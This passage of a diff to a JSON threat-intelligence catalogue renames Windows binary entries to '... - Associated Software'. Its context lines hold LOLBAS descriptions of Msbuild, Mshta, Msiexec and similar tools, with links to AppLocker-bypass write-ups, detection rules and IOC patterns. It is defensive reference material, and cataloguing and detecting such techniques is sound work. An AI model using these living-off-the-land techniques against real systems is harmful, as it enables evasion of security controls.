@@ } ], "uuid": "7e97093f-629d-4de9-8c28-3adc429e3abb", - "value": "Msbuild.exe" + "value": "Msbuild.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used to compile and execute code\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe\n* C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe\n* C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe\n\n**Resources:**\n* [https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md)\n* [https://github.com/Cn33liz/MSBuildShell](https://github.com/Cn33liz/MSBuildShell)\n* [https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/](https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/)\n* [https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/](https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/)\n* [https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191](https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191)\n* [https://github.com/LOLBAS-Project/LOLBAS/issues/165](https://github.com/LOLBAS-Project/LOLBAS/issues/165)\n* [https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files](https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files)\n* [https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events](https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events)\n\n**Detection:**\n* Sigma: [file_event_win_shell_write_susp_directory.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml)\n* Sigma: [proc_creation_win_msbuild_susp_parent_process.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml)\n* Sigma: [net_connection_win_silenttrinity_stager_msbuild_activity.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml)\n* Splunk: [suspicious_msbuild_spawn.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml)\n* Splunk: [suspicious_msbuild_rename.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml)\n* Splunk: [msbuild_suspicious_spawned_by_script_process.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml)\n* Elastic: [defense_evasion_msbuild_beacon_sequence.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml)\n* Elastic: [defense_evasion_msbuild_making_network_connections.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml)\n* Elastic: [defense_evasion_execution_msbuild_started_by_script.toml](https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml)\n* Elastic: [defense_evasion_execution_msbuild_started_by_office_app.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml)\n* Elastic: [defense_evasion_execution_msbuild_started_renamed.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Msbuild.exe should not normally be executed on workstations[[LOLBAS Msbuild](/references/de8e0741-255b-4c41-ba50-248ac5acc325)]", @@ -18125,7 +18125,7 @@ } ], "uuid": "98ecedd7-7044-41c6-b9df-5b8c88b41713", - "value": "Msconfig.exe" + "value": "Msconfig.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\msconfig.exe\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/991314564896690177](https://twitter.com/pabraeken/status/991314564896690177)\n\n**Detection:**\n* Sigma: [proc_creation_win_uac_bypass_msconfig_gui.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml)\n* Sigma: [file_event_win_uac_bypass_msconfig_gui.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml)\n* IOC: mscfgtlc.xml changes in system32 folder[[Msconfig.exe - LOLBAS Project](/references/a073d2fc-d20d-4a52-944e-85ff89f04978)]", @@ -18168,7 +18168,7 @@ } ], "uuid": "69a34cf5-5e76-48b5-b1c0-9ab895dbd9f9", - "value": "Msdeploy.exe" + "value": "Msdeploy.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft tool used to deploy Web Applications.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/995837734379032576](https://twitter.com/pabraeken/status/995837734379032576)\n* [https://twitter.com/pabraeken/status/999090532839313408](https://twitter.com/pabraeken/status/999090532839313408)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_msdeploy.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml)[[Msdeploy.exe - LOLBAS Project](/references/e563af9a-5e49-4612-a52b-31f22f76193c)]", @@ -18211,7 +18211,7 @@ } ], "uuid": "19e717f8-ecab-48e6-83c0-90d8d20e875d", - "value": "Msdt.exe" + "value": "Msdt.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft diagnostics tool\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\Msdt.exe\n* C:\\Windows\\SysWOW64\\Msdt.exe\n\n**Resources:**\n* [https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/](https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/)\n* [https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/](https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/)\n* [https://twitter.com/harr0ey/status/991338229952598016](https://twitter.com/harr0ey/status/991338229952598016)\n* [https://twitter.com/nas_bench/status/1531944240271568896](https://twitter.com/nas_bench/status/1531944240271568896)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_msdt_answer_file.yml](https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml)\n* Sigma: [proc_creation_win_msdt_arbitrary_command_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)[[Msdt.exe - LOLBAS Project](/references/3eb1750c-a2f2-4d68-b060-ceb32f44f5fe)]", @@ -18254,7 +18254,7 @@ } ], "uuid": "79b9559f-79c5-4e40-85a9-6238400bb523", - "value": "Msedge.exe" + "value": "Msedge.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Edge browser\n\n**Author:** mr.d0x\n\n**Paths:**\n* c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe\n* c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\n\n**Resources:**\n* [https://twitter.com/mrd0x/status/1478116126005641220](https://twitter.com/mrd0x/status/1478116126005641220)\n* [https://twitter.com/mrd0x/status/1478234484881436672](https://twitter.com/mrd0x/status/1478234484881436672)\n\n**Detection:**\n* Sigma: [proc_creation_win_browsers_msedge_arbitrary_download.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml)\n* Sigma: [proc_creation_win_browsers_chromium_headless_file_download.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml)[[Msedge.exe - LOLBAS Project](/references/6169c12e-9753-4e48-8213-aff95b0f6a95)]", @@ -18297,7 +18297,7 @@ } ], "uuid": "51e2b302-2fa7-42c4-a559-6a77d987d48b", - "value": "msedge_proxy.exe" + "value": "msedge_proxy.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Edge Browser\n\n**Author:** Mert Daş\n\n**Paths:**\n* C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge_proxy.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\nNone Provided[[msedge_proxy.exe - LOLBAS Project](/references/a6fd4727-e22f-4157-9a5f-1217cb876b32)]", @@ -18339,7 +18339,7 @@ } ], "uuid": "0a528d20-d553-4d8d-a63c-14a0bcbd442f", - "value": "msedgewebview2.exe" + "value": "msedgewebview2.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content.\n\n**Author:** Matan Bahar\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe\n\n**Resources:**\n* [https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf](https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf)\n\n**Detection:**\n* IOC: msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path[[msedgewebview2.exe - LOLBAS Project](/references/8125ece7-10d1-4e79-8ea1-724fe46a3c97)]", @@ -18381,7 +18381,7 @@ } ], "uuid": "061ab2c8-f37a-4a57-95b4-9cc05d00f7e2", - "value": "Mshta.exe" + "value": "Mshta.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to execute html applications. (.hta)\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\mshta.exe\n* C:\\Windows\\SysWOW64\\mshta.exe\n\n**Resources:**\n* [https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4](https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4)\n* [https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct)\n* [https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/](https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/)\n* [https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)\n\n**Detection:**\n* Sigma: [proc_creation_win_mshta_susp_pattern.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml)\n* Sigma: [proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml)\n* Sigma: [proc_creation_win_mshta_lethalhta_technique.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml)\n* Sigma: [proc_creation_win_mshta_javascript.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml)\n* Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml)\n* Sigma: [image_load_susp_script_dotnet_clr_dll_load.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml)\n* Elastic: [defense_evasion_mshta_beacon.toml](https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml)\n* Elastic: [lateral_movement_dcom_hta.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml)\n* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)\n* Splunk: [suspicious_mshta_activity.yml](https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml)\n* Splunk: [detect_mshta_renamed.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml)\n* Splunk: [suspicious_mshta_spawn.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml)\n* Splunk: [suspicious_mshta_child_process.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml)\n* Splunk: [detect_mshta_url_in_command_line.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: mshta.exe executing raw or obfuscated script within the command-line\n* IOC: General usage of HTA file\n* IOC: msthta.exe network connection to Internet/WWW resource\n* IOC: DotNet CLR libraries loaded into mshta.exe\n* IOC: DotNet CLR Usage Log - mshta.exe.log[[LOLBAS Mshta](/references/915a4aef-800e-4c68-ad39-df67c3dbaf75)]", @@ -18480,7 +18480,7 @@ } ], "uuid": "1a75f478-ea4b-4beb-a2d0-7b51e7368cb6", - "value": "Mshtml.dll" + "value": "Mshtml.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft HTML Viewer\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\mshtml.dll\n* c:\\windows\\syswow64\\mshtml.dll\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/998567549670477824](https://twitter.com/pabraeken/status/998567549670477824)\n* [https://windows10dll.nirsoft.net/mshtml_dll.html](https://windows10dll.nirsoft.net/mshtml_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Mshtml.dll - LOLBAS Project](/references/1a135e0b-5a79-4a4c-bc70-fd8f3f84e1f0)]", @@ -18523,7 +18523,7 @@ } ], "uuid": "925dfacc-a078-4d5e-bddb-fd5e4e204b71", - "value": "Msiexec.exe" + "value": "Msiexec.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to execute msi files\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\msiexec.exe\n* C:\\Windows\\SysWOW64\\msiexec.exe\n\n**Resources:**\n* [https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/](https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/)\n* [https://twitter.com/PhilipTsukerman/status/992021361106268161](https://twitter.com/PhilipTsukerman/status/992021361106268161)\n* [https://badoption.eu/blog/2023/10/03/MSIFortune.html](https://badoption.eu/blog/2023/10/03/MSIFortune.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_msiexec_web_install.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml)\n* Sigma: [proc_creation_win_msiexec_masquerading.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* Splunk: [uninstall_app_using_msiexec.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml)\n* IOC: msiexec.exe retrieving files from Internet[[LOLBAS Msiexec](/references/996cc7ea-0729-4c51-b9c3-b201ec32e984)]", @@ -18586,7 +18586,7 @@ } ], "uuid": "fc985102-ca75-491e-8eac-ba8ce06670e2", - "value": "MsoHtmEd.exe" + "value": "MsoHtmEd.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Office component\n\n**Author:** Nir Chako\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSOHTMED.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office\\Office16\\MSOHTMED.exe\n* C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSOHTMED.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office\\Office15\\MSOHTMED.exe\n* C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSOHTMED.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office\\Office14\\MSOHTMED.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_msohtmed_download.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml)\n* IOC: Suspicious Office application internet/network traffic[[MsoHtmEd.exe - LOLBAS Project](/references/c39fdefa-4c54-48a9-8357-ffe4dca2a2f4)]", @@ -18629,7 +18629,7 @@ } ], "uuid": "b36cdee2-05cb-44fb-853d-299e0a90165e", - "value": "Mspub.exe" + "value": "Mspub.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Publisher\n\n**Author:** Nir Chako\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSPUB.exe\n* C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSPUB.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSPUB.exe\n* C:\\Program Files\\Microsoft Office\\Office16\\MSPUB.exe\n* C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSPUB.exe\n* C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSPUB.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSPUB.exe\n* C:\\Program Files\\Microsoft Office\\Office15\\MSPUB.exe\n* C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSPUB.exe\n* C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSPUB.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.exe\n* C:\\Program Files\\Microsoft Office\\Office14\\MSPUB.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_mspub_download.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml)\n* IOC: Suspicious Office application internet/network traffic[[Mspub.exe - LOLBAS Project](/references/41eff63a-fef0-4b4b-86f7-0908150fcfcf)]", @@ -18672,7 +18672,7 @@ } ], "uuid": "9ccccfe2-f653-42f7-9e36-3158781f4e2a", - "value": "msxsl.exe" + "value": "msxsl.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Command line utility used to perform XSL transformations.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* no default\n\n**Resources:**\n* [https://twitter.com/subTee/status/877616321747271680](https://twitter.com/subTee/status/877616321747271680)\n* [https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker](https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker)\n* [https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file](https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file)\n\n**Detection:**\n* Sigma: [proc_creation_win_wmic_xsl_script_processing.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml)\n* Elastic: [defense_evasion_msxsl_beacon.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml)\n* Elastic: [defense_evasion_msxsl_network.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)[[msxsl.exe - LOLBAS Project](/references/4e1ed0a8-60d0-45e2-9592-573b904811f8)]", @@ -19098,7 +19098,7 @@ } ], "uuid": "ef9df548-c7c2-41fd-96f1-acdb9e8a763c", - "value": "net.exe" + "value": "net.exe - Associated Software" }, { "description": "The [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. [[Microsoft Net Utility](https://app.tidalcyber.com/references/75998d1c-69c0-40d2-a64b-43ad8efa05da)]\n\n[Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) has a great deal of functionality, [[Savill 1999](https://app.tidalcyber.com/references/e814d4a5-b846-4d68-ac00-7021238d287a)] much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) using net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.", @@ -19274,7 +19274,7 @@ } ], "uuid": "edb7867e-195e-4a88-9198-f118a64af6b0", - "value": "NetC" + "value": "NetC - Associated Software" }, { "description": "[Net Crawler](https://app.tidalcyber.com/software/947c6212-4da8-48dd-9da9-ce4b077dd759) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) to execute a copy of [Net Crawler](https://app.tidalcyber.com/software/947c6212-4da8-48dd-9da9-ce4b077dd759). [[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]", @@ -19345,7 +19345,7 @@ } ], "uuid": "f0875544-e774-4ba7-8ed3-c9828ea69fbd", - "value": "netsh.exe" + "value": "netsh.exe - Associated Software" }, { "description": "[netsh](https://app.tidalcyber.com/software/803192b8-747b-4108-ae15-2d7481d39162) is a scripting utility used to interact with networking components on local or remote systems. [[TechNet Netsh](https://app.tidalcyber.com/references/58112a3a-06bd-4a46-8a09-4dba5f42a04f)]", @@ -19531,7 +19531,7 @@ } ], "uuid": "ebe1fe56-5d87-444f-bf06-76d18f19b788", - "value": "Mailto" + "value": "Mailto - Associated Software" }, { "description": "", @@ -19547,7 +19547,7 @@ } ], "uuid": "4ff19645-f405-4bc2-847b-13409fce15cf", - "value": "Koko Ransomware" + "value": "Koko Ransomware 